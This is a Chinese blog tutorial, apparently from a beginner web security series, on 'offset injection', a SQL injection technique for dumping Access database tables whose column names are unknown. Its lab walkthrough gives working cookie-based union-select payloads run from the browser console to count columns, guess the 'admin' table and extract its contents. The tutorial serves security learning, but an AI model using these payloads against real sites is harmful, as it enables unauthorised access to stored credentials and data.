web安全入门(第五章-2)偏移注入

最新推荐文章于 2022-05-02 13:32:38 发布
最新推荐文章于 2022-05-02 13:32:38 发布
阅读量437 收藏
点赞数
分类专栏: 安全入门 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/106491807
版权

一、偏移注入使用场景

    早sql注入得时候会遇到一些无法查询列名得问题,比如系统自带数据库的
	权限不够而无法访问系统自带库。
	或者遇到Access数据库

	当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。
	
	向sqlmap之类的工具实际上是爆破字段名的名字,但是如果字段名称比较奇葩,例如:H5scker_passwd 之类的那就无可奈何了。

总结:
		~权限不够
		~遇到access数据库,且列名奇葩难爆破时

	.*  =>正则[匹配所有]
	.*  =>*=>在数据库中*也代表一切  
	
	select table_name from information_schema(库).tables(表) where table_schema=database()   //  查询(当前库)系统自带库里面的表名

	information_schema(库).tables(表)=>information_schema(库)库里面的这个表

	库.表 => 选中这个库里面这个表
	库.表.字段
	admin.*=>admin 表里面所有的字段
    select admin.username from admin=>select username from admin 
	
	mysql联合查询不用from表名
	示例 select*from admin union select 1,2,3 (from user)//括号中的内容可不写
	
	access需要from表名
示例 select*from admin union select 1,2,3 (from user)//括号中的内容必须写

二、偏移注入步骤

偏移注入:不存在注入:寻找其他页面
                      寻找其他参数

		  存在注入:联合查询:
			   	猜字段数  order by 1
							  
				猜显错点 : union select 1,2,3,4,5,
						注:access需要先猜表名,因为查询语句必须写表名
				猜表名  :mysql:查询自带库自带表
						accees:强行猜解and exists(select*from表名)
				猜不到字段名:开始偏移:例子:union select 1,admin.*,10 from admin
						注:注入点的表的字段越多越好满足一个条件 注入点的表字段要大于你查询的字段
							然后开始不断的移动表.*来输出各种数据

一、偏移注入步骤(Access为例)

	1.判断注入点:
		当在url中输入and 1=1和and1=2时,出现错误提示,说明Get传参被处理了,我们就需要看看Cookie传参是否没有被处理。
		使用js代码在控制台判断。
		document.cookie="id="+escape("xx and 1=1")
		document.cookie="id="+escape("xx and 1=2")	
	2.order by 判断字段数:
		document.cookie="id="+escape("xx order by 1")	
	3.判断表名:
		document.cookie="id="+escpe("xx and(exists(select * from admin))")	
	4.联合查询(判断输出点):
		字段数相同
		注入点的表的字段一定要大于查询的表
		top x取几条数据,一点要降序,才能达到limit的效果
		docuemnt.cookie="id="+escape("xx union select 1,2,3…… from admin")		
	5.获取表中列数(知道存在几列以及输出点):
		docuemnt.cookie="id="+escape("xx union select 1,2,3…… admin.* from admin")		
	6.开始偏移注入:
		docuemnt.cookie="id="+escape("xx union select 1,2,admin.*,3 from admin")
解释:admin为想要查询数据的表名
	  3为输出点。

靶场作业:

	判断字段数
	105 order by 26 页面正常
	document.cookie="id="+escape("105 order by 27") 页面错误  说明存在26个字段

	猜解表名
	document.cookie="id="+escape("105 and exists(select *from admin)") 
	页面正常 说明存在admin表

	找回显点
	document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin") 
	出现 3 5 7 25四个回显点  25也是回显点只不过被隐藏了

	找字段数
	document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,*from admin") 显示错误
	document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,*from admin")显示错误
	多次尝试发现有admin表有16个字段
	document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,*from admin")

	爆内容
	经过调整admin.*的位置可以爆出admin 表的所有内容
	document.cookie="id="+escape("105 union select admin.*,1,2,3,4,5,6,7,8,9,10 from admin")
	document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,admin.*,10 from admin")
YINZHE_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入详解
m0_67391121的博客
07-28 3463
WAF(WebApplicationFirewall)的中文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义中,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。...
SQL注入——Access (偏移注入)
最新发布
weixin_74991270的博客
10-10 94
切记:Access只有一个数据库,没有什么系统自带库;猜表名(实际一点就行);爆破过程有点麻烦,一定要有耐心。
SQL注入偏移注入(Access)
秋水的博客
09-02 5074
注入简介 什么是偏移注入偏移注入是一种注入姿势,可以根据一个较多字段的表对一个少字段的表进行偏移注入,一般是联合查询,在页面有回显点的情况下 偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。 像Sqlmap之类的工具实际上是爆破...
Access数据库注入偏移注入
seek_2022的博客
05-02 2490
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
渗透测试基础-Access数据库偏移注入
weixin_45488495的博客
04-12 410
渗透测试基础-Access数据库偏移注入偏移注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 偏移注入 偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。 先来了解一些数据库小知识 select * from school 代表的是查询school表里面的所有数据(如图) 但其实我们可以换其他的写法,来达到相同的查询效果 select school.* from school 所以咱们这里的
渗透————偏移注入
longger_lee
11-16 2022
偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。             偏移注入的流程:                  1,判断字段数。例如:order by 猜字段数为22                  2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)        
Access——偏移注入
qq_45300786的博客
07-20 702
Access数据库没有系统自带库 =》只能强行猜解。 那有没有种方法,可以不知道字段名就查询数据呢。 这种方法就叫做偏移注入 既然如此我们在使用偏移注入之前要了解一些函数。 可以发现这三个查询语句时等价的, 第一个的 * 号,表示一切东西(表名,字段名) 第二个的*号,表示所有的字段名 直接开始 前面的内容是上一篇的access——cookie的内容,这里我就不多赘述。 判断回显位。 171+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10+fr
第1章-AutoCAD-2007入门基础.ppt
11-21
学习AutoCAD 2007入门基础的目标是掌握软件的基本功能,熟悉经典界面布局,了解图形文件的创建、打开和保存方法,以及设置参数选项、图形单位、绘图限制,同时熟练运用命令和系统变量。 重点学习内容包括: 1. Auto...
FK.rar_F-K偏移_FK偏移_f-k 偏移_偏移 地震_地震
09-23
5. **图像后处理**:最后,可能还需要对生成的偏移图像进行平滑、增强等后处理,以优化视觉效果和地质解释。 通过学习这个FK.rar中的内容,新手可以了解到F-K偏移的基本原理、算法实现以及如何在C语言环境下编程...
Web前端开发技术-元素偏移量offset应用.pptx
07-07
Web前端开发技术中,元素偏移量`offset`是一个重要的概念,主要用于获取元素在页面上的精确位置和尺寸信息。`offset`属性主要包括`offsetLeft`、`offsetTop`、`offsetWidth`和`offsetHeight`四个主要部分。 1. `...
Access偏移注入利用-01
09-15
Access偏移注入利用-01
行业分类-设备装置-微调偏移测量平台装置.zip
09-02
微调偏移测量平台装置是精密工程领域中不可或缺的一部分,主要应用于各种高精度测量和定位任务,例如在半导体制造、光学仪器校准、精密机械加工等领域。这种装置的设计和使用涉及多个IT领域的知识,包括机械工程、...
Access偏移注入
10-02
Access偏移注入教程 该文章出自『草哲's BLOG』,原文链接:http://www.337479.cn/alias/access-migration-into-the/
mysql偏移注入_偏移注入 - Michae1_('_')t - 博客园
weixin_42501119的博客
01-19 179
0x00:前言应用场景:Access、mysql数据库,知道表名,但是列名猜解不出来。偏移注入是access比较独有的一种注入手段,很有特点(人品)的注入方式,一般用于在猜解了表名但是没有猜解出列名的情况下使用0x01:流程(1)注入点(2)判断字段数order by(3)判断显示位置union select 1,2,3,4,5,6...... from table注:还有隐性显位!例如:表面上只...
数据库偏移注入原理
Do的博客
11-16 513
数据库偏移注入原理 场景 在常见的SQL注入当中,一般是将数据库中的表名、列名猜解出来之后,然后通过查询的方式获取具体的数据值。如SqlMap就是采用这样的注入流程进行数据获取的。但是这样的方式存在一个问题就是当知道数据表的名字,但是列名很长,或者数据库系统比较简单,不能通过查询系统数据库中的信息获取到用户表中的表名时就很难获取到想要的数据信息,如access数据库。(比如其中SQL Server 和MySQL都可以通过查询系统数据库获取到具体的列名) 原理 简单来说偏移注入的原理就是通过连接查询方式
偏移注入-常见问题汇总
weixin_30478757的博客
07-28 203
偏移注入常见问题汇总 1. Access偏移注入使用场景 一些无法查询的列名,比如权限不足的知道表名却不知道字段 使用偏移查询主要查询字段及内容等 2. 偏移注入是否仅用于Access 不是,mysql也可以使用偏移注入 3. 为什么可以cookie注入 因为在这里接受参数的时候使用了REQUEST,他可以接受get 和POST 和 COOKIE的传参 4. ...
access 偏移注入 案例
eT48_Sec
03-14 1244
news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id 看个案例就明白是什么意思了 先是背景 news.asp?id=3306 存在注入 然后通过 order by 可知查询返回 12 列 通过数据表字典跑出管理员表 m
access偏移注入及mssqlmysql注入技巧
一个码农的笔记
11-05 1975
一:例子是: 【1】http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886 首先猜表名: http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886 and exists(selec
show-overflow-tooltip偏移
09-15
根据提供的引用内容,show-overflow-...然而,没有提供关于show-overflow-tooltip偏移的具体信息,因此无法给出关于它偏移的答案。请提供更多关于show-overflow-tooltip偏移的细节,以便我可以为您提供更准确的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值